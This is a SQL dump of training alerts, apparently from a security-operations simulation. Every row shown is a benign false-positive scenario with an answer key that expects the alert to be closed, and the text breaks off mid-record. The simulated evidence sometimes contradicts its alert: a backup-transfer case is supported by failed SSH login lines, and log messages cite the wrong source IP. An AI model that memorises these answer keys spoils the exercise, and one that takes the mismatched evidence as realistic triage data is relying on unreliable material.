(1805, 'Benign System Health Check Activity', 'low', 'Elastic SIEM', 'Regular system health check scripts executed on multiple servers. These scripts are part of routine maintenance.', 'Execution', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:22:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.20\",\"username\":\"health_check\",\"hostname\":\"MONITOR-01\",\"command_line\":\"python health_check.py\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used for health checks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"python health_check.py\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine health check script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"This activity is part of regular system checks and does not indicate an attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"health_check\\\",\\\"hostname\\\":\\\"MONITOR-01\\\",\\\"command_line\\\":\\\"python health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"health_check\\\",\\\"hostname\\\":\\\"MONITOR-01\\\",\\\"command_line\\\":\\\"python health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"health_check\\\",\\\"hostname\\\":\\\"MONITOR-01\\\",\\\"command_line\\\":\\\"python health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"health_check\\\",\\\"hostname\\\":\\\"MONITOR-01\\\",\\\"command_line\\\":\\\"python health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.324Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"health_check\\\",\\\"hostname\\\":\\\"MONITOR-01\\\",\\\"command_line\\\":\\\"python health_check.py\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1806, 'Misconfigured Legacy Application Detected', 'medium', 'Azure Sentinel', 'A legacy application generated unusual traffic patterns due to misconfiguration. No malicious activity detected.', 'Network Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.10\",\"dst_ip\":\"203.0.113.10\",\"hostname\":\"LEGACY-APP-01\",\"command_line\":\"curl http://203.0.113.10:8080/api/ping\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"External IP with no malicious reports\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The traffic was generated by a misconfigured legacy application and is not harmful.\"}', 'Intermediate', 'SIEM', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.326Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"LEGACY-APP-01\\\",\\\"command_line\\\":\\\"curl http://203.0.113.10:8080/api/ping\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.326Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"LEGACY-APP-01\\\",\\\"command_line\\\":\\\"curl http://203.0.113.10:8080/api/ping\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.326Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"LEGACY-APP-01\\\",\\\"command_line\\\":\\\"curl http://203.0.113.10:8080/api/ping\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.326Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"LEGACY-APP-01\\\",\\\"command_line\\\":\\\"curl http://203.0.113.10:8080/api/ping\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.326Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"LEGACY-APP-01\\\",\\\"command_line\\\":\\\"curl http://203.0.113.10:8080/api/ping\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1807, 'Scheduled Data Sync Detected', 'low', 'Splunk', 'A data synchronization task was detected between internal databases. This is part of regular data management operations.', 'Data Transfer', 'T1029', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:05:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"10.0.0.20\",\"username\":\"db_sync_user\",\"hostname\":\"DB-SYNC-01\",\"command_line\":\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > backup.sql\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used for data synchronization\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > backup.sql\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized database synchronization command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_transfer\",\"analysis_notes\":\"This alert was generated by a scheduled data synchronization task and is not indicative of an attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.328Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:05:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"db_sync_user\\\",\\\"hostname\\\":\\\"DB-SYNC-01\\\",\\\"command_line\\\":\\\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > backup.sql\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.328Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:05:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"db_sync_user\\\",\\\"hostname\\\":\\\"DB-SYNC-01\\\",\\\"command_line\\\":\\\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > backup.sql\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.328Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:05:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"db_sync_user\\\",\\\"hostname\\\":\\\"DB-SYNC-01\\\",\\\"command_line\\\":\\\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > backup.sql\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.328Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:05:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"db_sync_user\\\",\\\"hostname\\\":\\\"DB-SYNC-01\\\",\\\"command_line\\\":\\\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > backup.sql\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.328Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:05:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"db_sync_user\\\",\\\"hostname\\\":\\\"DB-SYNC-01\\\",\\\"command_line\\\":\\\"pg_dump -h 10.0.0.20 -U db_sync_user -d production_db > backup.sql\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1808, 'Routine IT Vulnerability Scanning Detected as Brute Force Attack', 'low', 'Wazuh', 'A series of failed login attempts were detected originating from an internal scanner IP. This activity was identified as part of a routine vulnerability scan.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.100\",\"username\":\"admin\",\"hostname\":\"internal-scanner\",\"failed_attempts\":20}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP used for routine vulnerability scans\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP belongs to an internal scanner used by IT for routine vulnerability assessments, making the alert a false positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.329Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T13:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-scanner\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:04:28.329Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T13:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-scanner\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:03:28.329Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T13:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-scanner\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:02:28.329Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T13:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-scanner\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:01:28.329Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T13:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-scanner\\\",\\\"failed_attempts\\\":20}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1809, 'Authorized Administrative Backups Detected as Data Exfiltration', 'medium', 'Splunk', 'Data transfers to a backup server were flagged as potential data exfiltration. These transfers are part of scheduled administrative backups.', 'Data Exfiltration', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"10.0.0.5\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP is part of authorized backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Authorized backup server destination\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The activity is consistent with routine backup operations, hence categorized as a false positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.331Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.331Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.331Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.331Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.331Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1810, 'Benign System Health Check Detected as Malicious Execution', 'low', 'Elastic SIEM', 'A system health check process was mistakenly flagged as malicious due to the execution of a common diagnostic tool.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"\",\"username\":\"sysadmin\",\"hostname\":\"diagnostic-tool\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\diagnostic.exe\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\System32\\\\diagnostic.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized system health diagnostic tool\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"This process execution is part of a routine system health check and is not malicious.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.332Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"diagnostic-tool\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diagnostic.exe\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.332Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"diagnostic-tool\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diagnostic.exe\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.332Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"diagnostic-tool\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diagnostic.exe\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.332Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"diagnostic-tool\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diagnostic.exe\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.332Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"diagnostic-tool\\\",\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diagnostic.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1811, 'Misconfigured Legacy App Triggers Unauthorized Access Alert', 'medium', 'Azure Sentinel', 'An alert for unauthorized access was triggered by a legacy application due to misconfiguration, causing false login attempts.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"192.168.1.40\",\"username\":\"legacy_app\",\"hostname\":\"legacy-server\",\"failed_attempts\":10}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal application with known misconfiguration issues\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The misconfiguration in a legacy application caused false login attempts, resulting in a false positive alert.\"}', 'Intermediate', 'SIEM', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.334Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.40\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy-server\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-16T03:04:28.334Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.40\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"legacy-server\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-16T03:03:28.334Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 